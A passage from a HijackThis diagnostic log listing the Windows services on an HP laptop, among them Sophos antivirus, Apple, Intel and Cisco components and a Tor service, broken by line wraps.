(file missing)
O23 - Service: AMD

External Events

Utility - Unknown

owner - C:\Windows

\system32\atiesrxx.

exe (file missing)
O23 - Service:

Apple Mobile Device

- Apple Inc. - C:

\Program Files

(x86)\Common Files

\Apple\Mobile

Device Support

\AppleMobileDeviceS

ervice.exe
O23 - Service:

Bonjour Service -

Apple Inc. - C:

\Program Files

\Bonjour

\mDNSResponder.exe
O23 - Service: @C:

\Program Files

\Hewlett-Packard\HP

ProtectTools

Security Manager

\Bin\DpHostW.exe,-

128 (DpHost) -

DigitalPersona,

Inc. - C:\Program

Files\Hewlett-

Packard\HP

ProtectTools

Security Manager

\Bin\DpHostW.exe
O23 - Service: @

%SystemRoot%

\system32\efssvc.dl

l,-100 (EFS) -

Unknown owner - C:

\Windows

\System32\lsass.exe

(file missing)
O23 - Service: @

%systemroot%

\system32\fxsresm.d

ll,-118 (Fax) -

Unknown owner - C:

\Windows

\system32\fxssvc.ex

e (file missing)
O23 - Service:

FLEXnet Licensing

Service -

Macrovision Europe

Ltd. - C:\Program

Files (x86)\Common

Files\Macrovision

Shared\FLEXnet

Publisher

\FNPLicensingServic

e.exe
O23 - Service:

Google Update

Service (gupdate)

(gupdate) - Google

Inc. - C:\Program

Files (x86)\Google

\Update

\GoogleUpdate.exe
O23 - Service:

Google Update

Service (gupdatem)

(gupdatem) - Google

Inc. - C:\Program

Files (x86)\Google

\Update

\GoogleUpdate.exe
O23 - Service: HP

Quick

Synchronization

Service

(HPDrvMntSvc.exe) -

Hewlett-Packard

Company - C:

\Program Files

(x86)\Hewlett-

Packard\Shared

\HPDrvMntSvc.exe
O23 - Service:

hpHotkeyMonitor -

Hewlett-Packard

Company - C:

\Program Files

(x86)\Hewlett-

Packard\HP Hotkey

Support

\HPHotkeyMonitor.ex

e
O23 - Service: HP

Software Framework

Service (hpqwmiex)

- Hewlett-Packard

Company - C:

\Program Files

(x86)\Hewlett-

Packard\Shared

\hpqWmiEx.exe
O23 - Service: HP

Service (hpsrv) -

Unknown owner - C:

\Windows

\system32\Hpservice

.exe (file missing)
O23 - Service: @

%SystemRoot%

\system32\ieetwcoll

ectorres.dll,-1000

(IEEtwCollectorServ

ice) - Unknown

owner - C:\Windows

\system32\IEEtwColl

ector.exe (file

missing)
O23 - Service:

Security Platform

Management Service

(IFXSpMgtSrv) -

Infineon

Technologies AG -

C:\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\ifxspmgt.exe
O23 - Service:

Trusted Platform

Core Service

(IFXTCS) - Infineon

Technologies AG -

C:\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\ifxtcs.exe
O23 - Service: iPod

Service - Apple

Inc. - C:\Program

Files\iPod\bin

\iPodService.exe
O23 - Service:

@keyiso.dll,-100

(KeyIso) - Unknown

owner - C:\Windows

\system32\lsass.exe

(file missing)
O23 - Service:

Intel(R) Management

and Security

Application Local

Management Service

(LMS) - Intel

Corporation - C:

\Program Files

(x86)\Intel\Intel

(R) Management

Engine Components

\LMS\LMS.exe
O23 - Service:

@comres.dll,-2797

(MSDTC) - Unknown

owner - C:\Windows

\System32\msdtc.exe

(file missing)
O23 - Service: @

%SystemRoot%

\System32\netlogon.

dll,-102 (Netlogon)

- Unknown owner -

C:\Windows

\system32\lsass.exe

(file missing)
O23 - Service:

NitroPDFDriverCreat

orReadSpool9

(NitroDriverReadSpo

ol9) - Nitro PDF

Software - C:

\Program Files

\Common Files

\Nitro\Pro

\9.0\NitroPDFDriver

Service9x64.exe
O23 - Service:

Nalpeiron Licensing

Service (nlsX86cc)

- Nalpeiron Ltd. -

C:\Windows

\SysWOW64\NLSSRV32.

EXE
O23 - Service:

Personal Secure

Drive Service

(PersonalSecureDriv

eService) -

Infineon

Technologies AG -

C:\Program Files

(x86)\Hewlett-

Packard\Embedded

Security Software

\IfxPsdSv.exe
O23 - Service: @

%systemroot%

\system32\psbase.dl

l,-300

(ProtectedStorage)

- Unknown owner -

C:\Windows

\system32\lsass.exe

(file missing)
O23 - Service: @

%systemroot%

\system32\Locator.e

xe,-2 (RpcLocator)

- Unknown owner -

C:\Windows

\system32\locator.e

xe (file missing)
O23 - Service: @

%SystemRoot%

\system32\samsrv.dl

l,-1 (SamSs) -

Unknown owner - C:

\Windows

\system32\lsass.exe

(file missing)
O23 - Service:

Sophos Anti-Virus

status reporter

(SAVAdminService) -

Sophos Limited -

C:\Program Files

(x86)\Sophos\Sophos

Anti-Virus

\SAVAdminService.ex

e
O23 - Service:

Sophos Anti-Virus

(SAVService) -

Sophos Limited -

C:\Program Files

(x86)\Sophos\Sophos

Anti-Virus

\SavService.exe
O23 - Service:

Skype Updater

(SkypeUpdate) -

Skype Technologies

- C:\Program Files

(x86)\Skype

\Updater

\Updater.exe
O23 - Service: @

%SystemRoot%

\system32\snmptrap.

exe,-3 (SNMPTRAP) -

Unknown owner - C:

\Windows

\System32\snmptrap.

exe (file missing)
O23 - Service:

Sophos Agent -

Sophos Limited -

C:\Program Files

(x86)\Sophos\Remote

Management System

\ManagementAgentNT.

exe
O23 - Service:

Sophos AutoUpdate

Service - Sophos

Limited - C:

\Program Files

(x86)\Sophos

\AutoUpdate

\ALsvc.exe
O23 - Service:

Sophos Message

Router - Sophos

Limited - C:

\Program Files

(x86)\Sophos\Remote

Management System

\RouterNT.exe
O23 - Service:

Sophos Web Control

Service - Sophos

Limited - C:

\Program Files

(x86)\Sophos\Sophos

Anti-Virus\Web

Control

\swc_service.exe
O23 - Service: @

%systemroot%

\system32\spoolsv.e

xe,-1 (Spooler) -

Unknown owner - C:

\Windows

\System32\spoolsv.e

xe (file missing)
O23 - Service: @

%SystemRoot%

\system32\sppsvc.ex

e,-101 (sppsvc) -

Unknown owner - C:

\Windows

\system32\sppsvc.ex

e (file missing)
O23 - Service: @

%SystemRoot%

\system32\stlang64.

dll,-10101 (STacSV)

- IDT, Inc. - C:

\Program Files\IDT

\WDM\STacSV64.exe
O23 - Service:

Sophos Web

Intelligence

Service

(swi_service) -

Sophos Limited -

C:\Program Files

(x86)\Sophos\Sophos

Anti-Virus\Web

Intelligence

\swi_service.exe
O23 - Service:

Sophos Web

Intelligence Update

(swi_update_64) -

Sophos Limited -

C:\ProgramData

\Sophos\Web

Intelligence

\swi_update_64.exe
O23 - Service: Tor

Win32 Service (tor)

- Unknown owner -

C:\Program Files

(x86)\Tor\tor.exe
O23 - Service: @

%SystemRoot%

\system32\ui0detect

.exe,-101

(UI0Detect) -

Unknown owner - C:

\Windows

\system32\UI0Detect

.exe (file missing)
O23 - Service:

Intel(R) Management

and Security

Application User

Notification

Service (UNS) -

Intel Corporation -

C:\Program Files

(x86)\Intel\Intel

(R) Management

Engine Components

\UNS\UNS.exe
O23 - Service: @

%SystemRoot%

\system32\vaultsvc.

dll,-1003

(VaultSvc) -

Unknown owner - C:

\Windows

\system32\lsass.exe

(file missing)
O23 - Service:

Validity VCS

Fingerprint Service

(vcsFPService) -

Validity Sensors,

Inc. - C:\Windows

\system32\vcsFPServ

ice.exe
O23 - Service: @

%SystemRoot%

\system32\vds.exe,-

100 (vds) - Unknown

owner - C:\Windows

\System32\vds.exe

(file missing)
O23 - Service:

Cisco AnyConnect

Secure Mobility

Agent (vpnagent) -

Cisco Systems, Inc.

- C:\Program Files

(x86)\Cisco\Cisco

AnyConnect Secure

Mobility Client

\vpnagent.exe
O23 - Service: @

%systemroot%

\system32\vssvc.exe

,-102 (VSS) -

Unknown owner - C:

\Windows

\system32\vssvc.exe

(file missing)
O23 - Service: @

%SystemRoot%

\system32\Wat

\WatUX.exe,-601

(WatAdminSvc) -

Unknown owner - C:

\Windows

\system32\Wat

\WatAdminSvc.exe

(file missing)
O23 - Service: @

%systemroot%

\system32\wbengine.

exe,-104 (wbengine)

- Unknown owner -

C:\Windows

\system32\wbengine.

exe (file missing)
O23 - Service:

Mobile Broadband

Service

(WMCoreService) -

Ericsson AB - C:

\Program Files

(x86)\Ericsson

\Mobile Broadband

Drivers\WMCore

\mini_WMCore.exe
O23 - Service: @

%Systemroot%

\system32\wbem

\wmiapsrv.exe,-110

(wmiApSrv) -

Unknown owner - C:

\Windows

\system32\wbem

\WmiApSrv.exe (file

missing)
O23 - Service: @

%PROGRAMFILES%

\Windows Media

Player

\wmpnetwk.exe,-101

(WMPNetworkSvc) -

Unknown owner - C:

\Program Files

(x86)\Windows Media

Player\wmpnetwk.exe

(file missing)

--
End of file - 18297

bytes

------------------------------------------------------------